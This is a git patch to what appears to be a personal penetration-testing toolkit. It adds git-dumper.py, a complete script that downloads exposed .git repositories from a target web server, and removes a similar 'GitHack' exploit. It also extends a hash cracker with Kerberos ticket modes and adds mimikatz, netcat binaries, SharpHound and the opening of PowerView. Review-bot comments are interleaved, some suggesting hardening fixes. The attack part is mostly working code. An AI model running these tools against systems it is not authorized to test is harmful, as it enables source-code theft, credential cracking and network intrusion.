From 3f08063b4fee8fa512ec39cd71e1b198f77c8223 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Mon, 8 Jun 2020 14:28:22 +0200 Subject: [PATCH] win binaries + git-dumper + crack_hash --- GitHack.py | 236 - README.md | 6 +- crack_hash.py | 19 +- git-dumper.py | 556 + util.py | 12 + win/PowerView.ps1 | 20914 +++++++++++++++++++++++++++++ win/SharpHound.exe | Bin 0 -> 832512 bytes mimikatz.exe => win/mimikatz.exe | Bin win/nc.exe | Bin 0 -> 38616 bytes win/nc64.exe | Bin 0 -> 45272 bytes powercat.ps1 => win/powercat.ps1 | 0 winPEAS.bat => win/winPEAS.bat | 0 12 files changed, 21502 insertions(+), 241 deletions(-) delete mode 100644 GitHack.py mode change 100644 => 100755 crack_hash.py create mode 100755 git-dumper.py create mode 100644 win/PowerView.ps1 create mode 100644 win/SharpHound.exe rename mimikatz.exe => win/mimikatz.exe (100%) create mode 100644 win/nc.exe create mode 100644 win/nc64.exe rename powercat.ps1 => win/powercat.ps1 (100%) rename winPEAS.bat => win/winPEAS.bat (100%) diff --git a/GitHack.py b/GitHack.py deleted file mode 100644 index c5897c0..0000000 --- a/GitHack.py +++ /dev/null 
@@ -1,236 +0,0 @@ -#!/usr/bin/env python - -from urllib.parse import urlparse -import threading -import collections -import binascii -import requests -import struct -import queue -import time -import ssl -import sys -import os -import re - -def check(boolean, message): - if not boolean: - print("error: " + message) - exit(1) - -def parse(filename, pretty=True): - with open(filename, "rb") as f: - # f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) - - def read(format): - # "All binary numbers are in network byte order." - # Hence "!" = network order, big endian - format = "! " + format - bytes = f.read(struct.calcsize(format)) - return struct.unpack(format, bytes)[0] - - index = collections.OrderedDict() - - # 4-byte signature, b"DIRC" - index["signature"] = f.read(4).decode("ascii") - check(index["signature"] == "DIRC", "Not a Git index file") - - # 4-byte version number - index["version"] = read("I") - check(index["version"] in {2, 3}, - "Unsupported version: %s" % index["version"]) - - # 32-bit number of index entries, i.e. 
4-byte - index["entries"] = read("I") - - yield index - - for n in range(index["entries"]): - entry = collections.OrderedDict() - - entry["entry"] = n + 1 - - entry["ctime_seconds"] = read("I") - entry["ctime_nanoseconds"] = read("I") - if pretty: - entry["ctime"] = entry["ctime_seconds"] - entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000 - del entry["ctime_seconds"] - del entry["ctime_nanoseconds"] - - entry["mtime_seconds"] = read("I") - entry["mtime_nanoseconds"] = read("I") - if pretty: - entry["mtime"] = entry["mtime_seconds"] - entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000 - del entry["mtime_seconds"] - del entry["mtime_nanoseconds"] - - entry["dev"] = read("I") - entry["ino"] = read("I") - - # 4-bit object type, 3-bit unused, 9-bit unix permission - entry["mode"] = read("I") - if pretty: - entry["mode"] = "%06o" % entry["mode"] - - entry["uid"] = read("I") - entry["gid"] = read("I") - entry["size"] = read("I") - - entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii") - entry["flags"] = read("H") - - # 1-bit assume-valid - entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8)) - # 1-bit extended, must be 0 in version 2 - entry["extended"] = bool(entry["flags"] & (0b01000000 << 8)) - # 2-bit stage (?) 
- stage_one = bool(entry["flags"] & (0b00100000 << 8)) - stage_two = bool(entry["flags"] & (0b00010000 << 8)) - entry["stage"] = stage_one, stage_two - # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF) - namelen = entry["flags"] & 0xFFF - - # 62 bytes so far - entrylen = 62 - - if entry["extended"] and (index["version"] == 3): - entry["extra-flags"] = read("H") - # 1-bit reserved - entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8)) - # 1-bit skip-worktree - entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8)) - # 1-bit intent-to-add - entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8)) - # 13-bits unused - # used = entry["extra-flags"] & (0b11100000 << 8) - # check(not used, "Expected unused bits in extra-flags") - entrylen += 2 - - if namelen < 0xFFF: - entry["name"] = f.read(namelen).decode("utf-8", "replace") - entrylen += namelen - else: - # Do it the hard way - name = [] - while True: - byte = f.read(1) - if byte == "\x00": - break - name.append(byte) - entry["name"] = b"".join(name).decode("utf-8", "replace") - entrylen += 1 - - padlen = (8 - (entrylen % 8)) or 8 - nuls = f.read(padlen) - check(set(nuls) == set([0]), "padding contained non-NUL") - - yield entry - - f.close() - -class Scanner(object): - def __init__(self): - self.base_url = sys.argv[-1] - - self.domain = urlparse(sys.argv[-1]).netloc.replace(':', '_') - if not os.path.exists(self.domain): - os.mkdir(self.domain) - - print('[+] Download and parse index file ...') - data = self._request_data(sys.argv[-1] + '/index') - with open('%s/index' % self.domain, 'wb') as f: - f.write(data) - self.queue = queue.Queue() - for entry in parse('index'): - if "sha1" in entry.keys(): - self.queue.put((entry["sha1"].strip(), entry["name"].strip())) - try: - print(entry['name']) - except Exception as e: - pass - self.lock = threading.Lock() - self.thread_count = 20 - self.STOP_ME = False - - @staticmethod - def _request_data(url): - 
print(url) - res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) - if res.status_code != 200: - raise Exception("Server returned: %d %s" % (res.status_code, res.reason)) - - return res.content - - def _print(self, msg): - self.lock.acquire() - try: - print(msg) - except Exception as e: - pass - self.lock.release() - - def get_back_file(self): - - while not self.STOP_ME: - - try: - sha1, file_name = self.queue.get(timeout=0.5) - except Exception as e: - break - - try: - folder = '/objects/%s/' % sha1[:2] - data = self._request_data(self.base_url + folder + sha1[2:]) - try: - data = zlib.decompress(data) - data = re.sub(r'blob \d+\00', '', data) - except: - # self._print('[Error] Fail to decompress %s' % file_name) - pass - - target_dir = os.path.join(self.domain, os.path.dirname(file_name)) - if target_dir and not os.path.exists(target_dir): - os.makedirs(target_dir) - with open(os.path.join(self.domain, file_name), 'wb') as f: - f.write(data) - self._print('[OK] %s' % file_name) - except Exception as e: - self._print('[Error] %s' % str(e)) - - self.exit_thread() - - def exit_thread(self): - self.lock.acquire() - self.thread_count -= 1 - self.lock.release() - - def scan(self): - for i in range(self.thread_count): - t = threading.Thread(target=self.get_back_file) - t.start() - - -if __name__ == '__main__': - context = ssl._create_unverified_context() - if len(sys.argv) == 1: - msg = """ - A `.git` folder disclosure exploit. By LiJieJie - - Usage: GitHack.py http://www.target.com/.git/ - - bug-report: my[at]lijiejie.com (http://www.lijiejie.com) - """ - print(msg) - exit() - - s = Scanner() - s.scan() - try: - while s.thread_count > 0: - time.sleep(0.1) - except KeyboardInterrupt as e: - s.STOP_ME = True - time.sleep(1.0) - print('User Aborted.') diff --git a/README.md b/README.md index d13438c..af283dd 100644 --- a/README.md +++ b/README.md 
@@ -3,10 +3,10 @@ This repository contains self-made and common scripts for information gathering, enumeration and more. ### Enumeration: Initial Scans -- first_scan.sh: Performs initial nmap scan (-A, -T5, -p-) +- first_scan.sh: Performs initial nmap scan - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt - ssh-check-username.py: Check if user enumeration works for ssh -- GitHack.py +- [git-dumper.py](https://github.com/arthaud/git-dumper) - [autorecon.py](https://github.com/Tib3rius/AutoRecon) - subdomainFuzz.sh: Fuzzes subdomains for a given domain @@ -22,7 +22,7 @@ This repository contains self-made and common scripts for information gathering, - genRevShell.py: Generates a reverse shell command (e.g. netcat, python, ...) - [php-reverse-shell.php](https://github.com/pentestmonkey/php-reverse-shell) - [p0wny-shell.php](https://github.com/flozz/p0wny-shell) -- [powercat.ps1][https://github.com/besimorhino/powercat] +- [powercat.ps1](https://github.com/besimorhino/powercat) ### Miscellaneous - upload_file.py: Starts a local tcp server, for netcat usage diff --git a/crack_hash.py b/crack_hash.py old mode 100644 new mode 100755 index 58bea2f..3f8579d --- a/crack_hash.py +++ b/crack_hash.py @@ -21,6 +21,7 @@ class HashType(enum.Enum): RAW_MD5 = 0 MD5_PASS_SALT = 10 MD5_SALT_PASS = 20 + WORDPRESS = 400 # SHA1 RAW_SHA1 = 100 @@ -57,6 +58,11 @@ class HashType(enum.Enum): CRYPT_SHA512 = 1800 CRYPT_APACHE = 1600 + # Kerberos + KERBEROS_AS_REQ = 7500 + KERBEROS_TGS_REP = 13100 + KERBEROS_AS_REP = 18200 + class Hash: def __init__(self, hash): 
@@ -84,6 +90,14 @@ class Hash: self.type.append(HashType.CRYPT_SHA512) elif crypt_type == "apr1": self.type.append(HashType.CRYPT_APACHE) + elif crypt_type == "krb5tgs": + self.type.append(HashType.KERBEROS_TGS_REP) + elif crypt_type == "krb5asreq": + self.type.append(HashType.KERBEROS_AS_REQ) + elif crypt_type == "krb5asrep": + self.type.append(HashType.KERBEROS_AS_REP) + elif crypt_type == "P": + self.type.append(HashType.WORDPRESS) else: self.isSalted = ":" in raw_hash if self.isSalted: @@ -144,6 +158,7 @@ if len(sys.argv) < 2: exit(1) hashes = [Hash(x) for x in filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])] +wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2] uncracked_hashes = { } for hash in hashes: @@ -156,7 +171,7 @@ for hash in hashes: if len(uncracked_hashes) > 0: uncracked_types = list(uncracked_hashes.keys()) num_types = len(uncracked_types) - if num_types > 0: + if num_types > 1: print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:") print() @@ -187,6 +202,6 @@ if len(uncracked_hashes) > 0: fp.write(b"%s\n" % hash.hash.encode("UTF-8")) fp.flush() - proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, "/usr/share/wordlists/rockyou.txt", "--force"]) + proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"]) proc.wait() fp.close() diff --git a/git-dumper.py b/git-dumper.py new file mode 100755 index 0000000..5c85b00 --- /dev/null +++ b/git-dumper.py 
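Review bot: The new `elif crypt_type == "P":` branch only recognises the `$P$` phpass prefix, while hashcat mode 400 (`HashType.WORDPRESS`) also accepts the `$H$` variant that phpBB-era phpass emits, so those hashes would fall through to the salted/unsalted guess in the `else` branch; `elif crypt_type in ("P", "H"):` covers both. The three Kerberos branches map `krb5tgs`/`krb5asreq`/`krb5asrep` unconditionally to the etype-23 modes 13100/7500/18200; if `crypt_type` is just the first `$`-delimited token (that parsing happens earlier in `__init__`, outside the hunk), an etype 17/18 ticket such as `$krb5tgs$17$...` would be tagged 13100 and rejected by hashcat, so the etype token should be inspected before the mode is chosen. The enclosing `Hash.__init__` starts and ends outside the hunk.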
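Review bot: `wordlist` is taken from `sys.argv[2]` or the rockyou default without checking that the file exists, so a typo or a non-Kali host only surfaces later, when hashcat is spawned with `--force` in the last hunk, after the interactive type selection and the temporary hash file have already been set up. A check right after the assignment, `if not os.path.isfile(wordlist):` / `print("Wordlist not found: %s" % wordlist)` / `sys.exit(1)`, fails fast with a clear message (this assumes `os` is imported at the top of the file, which is outside the hunk).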
@@ -0,0 +1,556 @@ +#!/usr/bin/env python3 +from contextlib import closing +import argparse +import multiprocessing +import os +import os.path +import re +import socket +import subprocess +import sys +import urllib.parse +import urllib3 + +import bs4 +import dulwich.index +import dulwich.objects +import dulwich.pack +import requests +import socks + +USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" + +def printf(fmt, *args, file=sys.stdout): + if args: + fmt = fmt % args + + file.write(fmt) + file.flush() + + +def is_html(response): + ''' Return True if the response is a HTML webpage ''' + return '' in response.text + + +def get_indexed_files(response): + ''' Return all the files in the directory index webpage ''' + html = bs4.BeautifulSoup(response.text, 'html.parser') + files = [] + + for link in html.find_all('a'): + url = urllib.parse.urlparse(link.get('href')) + + if (url.path and + url.path != '.' and + url.path != '..' 
and + not url.path.startswith('/') and + not url.scheme and + not url.netloc): + files.append(url.path) + + return files + + +def create_intermediate_dirs(path): + ''' Create intermediate directories, if necessary ''' + + dirname, basename = os.path.split(path) + + if dirname and not os.path.exists(dirname): + try: + os.makedirs(dirname) + except FileExistsError: + pass # race condition + + +def get_referenced_sha1(obj_file): + ''' Return all the referenced SHA1 in the given object file ''' + objs = [] + + if isinstance(obj_file, dulwich.objects.Commit): + objs.append(obj_file.tree.decode()) + + for parent in obj_file.parents: + objs.append(parent.decode()) + elif isinstance(obj_file, dulwich.objects.Tree): + for item in obj_file.iteritems(): + objs.append(item.sha.decode()) + elif isinstance(obj_file, dulwich.objects.Blob): + pass + else: + printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr) + sys.exit(1) + + return objs + + +class Worker(multiprocessing.Process): + ''' Worker for process_tasks ''' + + def __init__(self, pending_tasks, tasks_done, args): + super().__init__() + self.daemon = True + self.pending_tasks = pending_tasks + self.tasks_done = tasks_done + self.args = args + + def run(self): + # initialize process + self.init(*self.args) + + # fetch and do tasks + while True: + task = self.pending_tasks.get(block=True) + + if task is None: # end signal + return + + result = self.do_task(task, *self.args) + + assert isinstance(result, list), 'do_task() should return a list of tasks' + + self.tasks_done.put(result) + + def init(self, *args): + raise NotImplementedError + + def do_task(self, task, *args): + raise NotImplementedError + + +def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None): + ''' Process tasks in parallel ''' + + if not initial_tasks: + return + + tasks_seen = set(tasks_done) if tasks_done else set() + pending_tasks = multiprocessing.Queue() + tasks_done = multiprocessing.Queue() + num_pending_tasks = 
0 + + # add all initial tasks in the queue + for task in initial_tasks: + assert task is not None + + if task not in tasks_seen: + pending_tasks.put(task) + num_pending_tasks += 1 + tasks_seen.add(task) + + # initialize processes + processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)] + + # launch them all + for p in processes: + p.start() + + # collect task results + while num_pending_tasks > 0: + task_result = tasks_done.get(block=True) + num_pending_tasks -= 1 + + for task in task_result: + assert task is not None + + if task not in tasks_seen: + pending_tasks.put(task) + num_pending_tasks += 1 + tasks_seen.add(task) + + # send termination signal (task=None) + for _ in range(jobs): + pending_tasks.put(None) + + # join all + for p in processes: + p.join() + + +class DownloadWorker(Worker): + ''' Download a list of files ''' + + def init(self, url, directory, retry, timeout): + self.session = requests.Session() + self.session.verify = False + self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry)) + + def do_task(self, filepath, url, directory, retry, timeout): + with closing(self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + stream=True, + timeout=timeout, + headers={"User-Agent": USER_AGENT})) as response: + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + for chunk in response.iter_content(4096): + f.write(chunk) + + return [] + + +class RecursiveDownloadWorker(DownloadWorker): + ''' Download a directory recursively ''' + + def do_task(self, filepath, url, directory, retry, timeout): + with closing(self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + stream=True, + timeout=timeout, + headers={"User-Agent": USER_AGENT})) as response: + printf('[-] Fetching %s/%s 
[%d]\n', url, filepath, response.status_code) + + if (response.status_code in (301, 302) and + 'Location' in response.headers and + response.headers['Location'].endswith(filepath + '/')): + return [filepath + '/'] + + if response.status_code != 200: + return [] + + if filepath.endswith('/'): # directory index + assert is_html(response) + + return [filepath + filename for filename in get_indexed_files(response)] + else: # file + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + for chunk in response.iter_content(4096): + f.write(chunk) + + return [] + + +class FindRefsWorker(DownloadWorker): + ''' Find refs/ ''' + + def do_task(self, filepath, url, directory, retry, timeout): + response = self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + timeout=timeout, + headers={"User-Agent": USER_AGENT}) + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'w') as f: + f.write(response.text) + + # find refs + tasks = [] + + for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text): + ref = ref[0] + if not ref.endswith('*'): + tasks.append('.git/%s' % ref) + tasks.append('.git/logs/%s' % ref) + + return tasks + + +class FindObjectsWorker(DownloadWorker): + ''' Find objects ''' + + def do_task(self, obj, url, directory, retry, timeout): + filepath = '.git/objects/%s/%s' % (obj[:2], obj[2:]) + response = self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + timeout=timeout, + headers={"User-Agent": USER_AGENT}) + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + 
create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + f.write(response.content) + + # parse object file to find other objects + obj_file = dulwich.objects.ShaFile.from_path(abspath) + return get_referenced_sha1(obj_file) + + +def fetch_git(url, directory, jobs, retry, timeout): + ''' Dump a git repository into the output directory ''' + + assert os.path.isdir(directory), '%s is not a directory' % directory + assert not os.listdir(directory), '%s is not empty' % directory + assert jobs >= 1, 'invalid number of jobs' + assert retry >= 1, 'invalid number of retries' + assert timeout >= 1, 'invalid timeout' + + # find base url + if not url.startswith("http://") and not url.startswith("https://"): + url = "http://" + url + + url = url.rstrip('/') + if url.endswith('HEAD'): + url = url[:-4] + url = url.rstrip('/') + if url.endswith('.git'): + url = url[:-4] + url = url.rstrip('/') + + # check for /.git/HEAD + printf('[-] Testing %s/.git/HEAD ', url) + response = requests.get('%s/.git/HEAD' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + printf('[%d]\n', response.status_code) + + if response.status_code != 200: + printf('error: %s/.git/HEAD does not exist\n', url, file=sys.stderr) + return 1 + elif not response.text.startswith('ref:'): + printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr) + return 1 + + # check for directory listing + printf('[-] Testing %s/.git/ ', url) + response = requests.get('%s/.git/' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + printf('[%d]\n', response.status_code) + + if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response): + printf('[-] Fetching .git recursively\n') + process_tasks(['.git/', '.gitignore'], + RecursiveDownloadWorker, + jobs, + args=(url, directory, retry, timeout)) + + printf('[-] Running git checkout .\n') + os.chdir(directory) + subprocess.check_call(['git', 
'checkout', '.']) + return 0 + + # no directory listing + printf('[-] Fetching common files\n') + tasks = [ + '.gitignore', + '.git/COMMIT_EDITMSG', + '.git/description', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/commit-msg.sample', + '.git/hooks/post-commit.sample', + '.git/hooks/post-receive.sample', + '.git/hooks/post-update.sample', + '.git/hooks/pre-applypatch.sample', + '.git/hooks/pre-commit.sample', + '.git/hooks/pre-push.sample', + '.git/hooks/pre-rebase.sample', + '.git/hooks/pre-receive.sample', + '.git/hooks/prepare-commit-msg.sample', + '.git/hooks/update.sample', + '.git/index', + '.git/info/exclude', + '.git/objects/info/packs', + ] + process_tasks(tasks, + DownloadWorker, + jobs, + args=(url, directory, retry, timeout)) + + # find refs + printf('[-] Finding refs/\n') + tasks = [ + '.git/FETCH_HEAD', + '.git/HEAD', + '.git/ORIG_HEAD', + '.git/config', + '.git/info/refs', + '.git/logs/HEAD', + '.git/logs/refs/heads/master', + '.git/logs/refs/remotes/origin/HEAD', + '.git/logs/refs/remotes/origin/master', + '.git/logs/refs/stash', + '.git/packed-refs', + '.git/refs/heads/master', + '.git/refs/remotes/origin/HEAD', + '.git/refs/remotes/origin/master', + '.git/refs/stash', + '.git/refs/wip/wtree/refs/heads/master', #Magit + '.git/refs/wip/index/refs/heads/master' #Magit + ] + + process_tasks(tasks, + FindRefsWorker, + jobs, + args=(url, directory, retry, timeout)) + + # find packs + printf('[-] Finding packs\n') + tasks = [] + + # use .git/objects/info/packs to find packs + info_packs_path = os.path.join(directory, '.git', 'objects', 'info', 'packs') + if os.path.exists(info_packs_path): + with open(info_packs_path, 'r') as f: + info_packs = f.read() + + for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs): + tasks.append('.git/objects/pack/pack-%s.idx' % sha1) + tasks.append('.git/objects/pack/pack-%s.pack' % sha1) + + process_tasks(tasks, + DownloadWorker, 
+ jobs, + args=(url, directory, retry, timeout)) + + # find objects + printf('[-] Finding objects\n') + objs = set() + packed_objs = set() + + # .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/* + files = [ + os.path.join(directory, '.git', 'packed-refs'), + os.path.join(directory, '.git', 'info', 'refs'), + os.path.join(directory, '.git', 'FETCH_HEAD'), + os.path.join(directory, '.git', 'ORIG_HEAD'), + ] + for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'refs')): + for filename in filenames: + files.append(os.path.join(dirpath, filename)) + for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'logs')): + for filename in filenames: + files.append(os.path.join(dirpath, filename)) + + for filepath in files: + if not os.path.exists(filepath): + continue + + with open(filepath, 'r') as f: + content = f.read() + + for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content): + obj = obj[1] + objs.add(obj) + + # use .git/index to find objects + index_path = os.path.join(directory, '.git', 'index') + if os.path.exists(index_path): + index = dulwich.index.Index(index_path) + + for entry in index.iterblobs(): + objs.add(entry[1].decode()) + + # use packs to find more objects to fetch, and objects that are packed + pack_file_dir = os.path.join(directory, '.git', 'objects', 'pack') + if os.path.isdir(pack_file_dir): + for filename in os.listdir(pack_file_dir): + if filename.startswith('pack-') and filename.endswith('.pack'): + pack_data_path = os.path.join(pack_file_dir, filename) + pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx') + pack_data = dulwich.pack.PackData(pack_data_path) + pack_idx = dulwich.pack.load_pack_index(pack_idx_path) + pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx) + + for obj_file in pack.iterobjects(): + packed_objs.add(obj_file.sha().hexdigest()) + objs |= set(get_referenced_sha1(obj_file)) + + # fetch all objects + printf('[-] Fetching objects\n') + process_tasks(objs, + 
FindObjectsWorker, + jobs, + args=(url, directory, retry, timeout), + tasks_done=packed_objs) + + # git checkout + printf('[-] Running git checkout .\n') + os.chdir(directory) + + # ignore errors + subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb')) + + return 0 + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(usage='%(prog)s [options] URL DIR', + description='Dump a git repository from a website.') + parser.add_argument('url', metavar='URL', + help='url') + parser.add_argument('directory', metavar='DIR', + help='output directory') + parser.add_argument('--proxy', + help='use the specified proxy') + parser.add_argument('-j', '--jobs', type=int, default=10, + help='number of simultaneous requests') + parser.add_argument('-r', '--retry', type=int, default=3, + help='number of request attempts before giving up') + parser.add_argument('-t', '--timeout', type=int, default=3, + help='maximum time in seconds before giving up') + args = parser.parse_args() + + # jobs + if args.jobs < 1: + parser.error('invalid number of jobs') + + # retry + if args.retry < 1: + parser.error('invalid number of retries') + + # timeout + if args.timeout < 1: + parser.error('invalid timeout') + + # proxy + if args.proxy: + proxy_valid = False + + for pattern, proxy_type in [ + (r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5), + (r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4), + (r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP), + (r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5)]: + m = re.match(pattern, args.proxy) + if m: + socks.setdefaultproxy(proxy_type, m.group(1), int(m.group(2))) + socket.socket = socks.socksocket + proxy_valid = True + break + + if not proxy_valid: + parser.error('invalid proxy') + + # output directory + if not os.path.exists(args.directory): + os.makedirs(args.directory) + + if not os.path.isdir(args.directory): + parser.error('%s is not a directory' % args.directory) + + if os.listdir(args.directory): + parser.error('%s is not empty' 
% args.directory) + + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + # fetch everything + code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout) + path = os.path.realpath(args.directory) + if not os.listdir(path): + os.rmdir(path) + + sys.exit(code) diff --git a/util.py b/util.py index 43ce197..4b72381 100644 --- a/util.py +++ b/util.py @@ -1,6 +1,7 @@ import random import socket import netifaces as ni +import sys def getAddress(interface="tun0"): if not interface in ni.interfaces(): @@ -35,3 +36,14 @@ def openServer(address, ports=None): if not retry: print("Unable to listen on port %d: %s" % (listenPort, str(e))) raise e + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage: %s [command]" % sys.argv[0]) + exit(1) + + if sys.argv[1] == "getAddress": + if len(sys.argv) > 2: + print(getAddress(sys.argv[2])) + else: + print(getAddress()) diff --git a/win/PowerView.ps1 b/win/PowerView.ps1 new file mode 100644 index 0000000..2dc5234 --- /dev/null +++ b/win/PowerView.ps1 
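Review bot: Every worker writes to `os.path.abspath(os.path.join(directory, filepath))` with `filepath` supplied by the target server — directory-index links from `get_indexed_files` (which rejects only a literal `..`, not `a/../../x`) and ref names matched by the `refs(/[a-zA-Z0-9\-\.\_\*]+)+` regex in `FindRefsWorker` — so a hostile or misconfigured server can make the dumper write outside the output directory on the operator's machine. This file is a copy of arthaud/git-dumper (the README links it), so the fix belongs upstream too, but the copy carried here should resolve the path once and refuse anything that escapes the output root, as sketched below for `DownloadWorker`; the same replacement of the `abspath` line applies in `RecursiveDownloadWorker`, `FindRefsWorker` and `FindObjectsWorker`. Two smaller points of style: the common-files `tasks` list repeats `.git/hooks/applypatch-msg.sample` three times, and the `stderr=open(os.devnull, 'wb')` handle passed to the final `git checkout` is never closed.
```python
def resolve_output_path(directory, filepath):
    ''' Join filepath onto the output directory, refusing anything that escapes it '''
    root = os.path.abspath(directory)
    abspath = os.path.abspath(os.path.join(root, filepath))
    if abspath != root and not abspath.startswith(root + os.sep):
        return None
    return abspath

# … unchanged: get_referenced_sha1, Worker, process_tasks …

class DownloadWorker(Worker):
    # … unchanged: init …

    def do_task(self, filepath, url, directory, retry, timeout):
        # … unchanged: request, status logging and != 200 check …
            abspath = resolve_output_path(directory, filepath)
            if abspath is None:
                printf('[-] Skipping %s/%s: path escapes output directory\n', url, filepath, file=sys.stderr)
                return []
            create_intermediate_dirs(abspath)
            # … unchanged: chunked write …
```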
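Review bot: The new `__main__` block in util.py dispatches only on `getAddress`; any other argument falls through silently and the script exits 0 with no output, which a caller can mistake for an empty address. An `else:` branch printing `"Unknown command: %s" % sys.argv[1]` to stderr followed by `sys.exit(1)` gives callers a non-zero status, and since the first hunk now imports `sys`, the bare `exit(1)` on the usage path could become `sys.exit(1)` as well (the `exit` builtin comes from the `site` module and is absent under `python -S`).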
@@ -0,0 +1,20914 @@ +#requires -version 2 + +<# + +PowerSploit File: PowerView.ps1 +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +#> + + +######################################################## +# +# PSReflect code for Windows API access +# Author: @mattifestation +# https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1 +# +######################################################## + +function New-InMemoryModule { +<# +.SYNOPSIS + +Creates an in-memory assembly and module + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +When defining custom enums, structs, and unmanaged functions, it is +necessary to associate to an assembly module. This helper function +creates an in-memory module that can be passed to the 'enum', +'struct', and Add-Win32Type functions. + +.PARAMETER ModuleName + +Specifies the desired name for the in-memory assembly and module. If +ModuleName is not provided, it will default to a GUID. 
+ +.EXAMPLE + +$Module = New-InMemoryModule -ModuleName Win32 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0)] + [ValidateNotNullOrEmpty()] + [String] + $ModuleName = [Guid]::NewGuid().ToString() + ) + + $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) + $LoadedAssemblies = $AppDomain.GetAssemblies() + + foreach ($Assembly in $LoadedAssemblies) { + if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) { + return $Assembly + } + } + + $DynAssembly = New-Object Reflection.AssemblyName($ModuleName) + $Domain = $AppDomain + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run') + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False) + + return $ModuleBuilder +} + + +# A helper function used to reduce typing while defining function +# prototypes for Add-Win32Type. 
+function func { + Param ( + [Parameter(Position = 0, Mandatory = $True)] + [String] + $DllName, + + [Parameter(Position = 1, Mandatory = $True)] + [string] + $FunctionName, + + [Parameter(Position = 2, Mandatory = $True)] + [Type] + $ReturnType, + + [Parameter(Position = 3)] + [Type[]] + $ParameterTypes, + + [Parameter(Position = 4)] + [Runtime.InteropServices.CallingConvention] + $NativeCallingConvention, + + [Parameter(Position = 5)] + [Runtime.InteropServices.CharSet] + $Charset, + + [String] + $EntryPoint, + + [Switch] + $SetLastError + ) + + $Properties = @{ + DllName = $DllName + FunctionName = $FunctionName + ReturnType = $ReturnType + } + + if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes } + if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention } + if ($Charset) { $Properties['Charset'] = $Charset } + if ($SetLastError) { $Properties['SetLastError'] = $SetLastError } + if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint } + + New-Object PSObject -Property $Properties +} + + +function Add-Win32Type 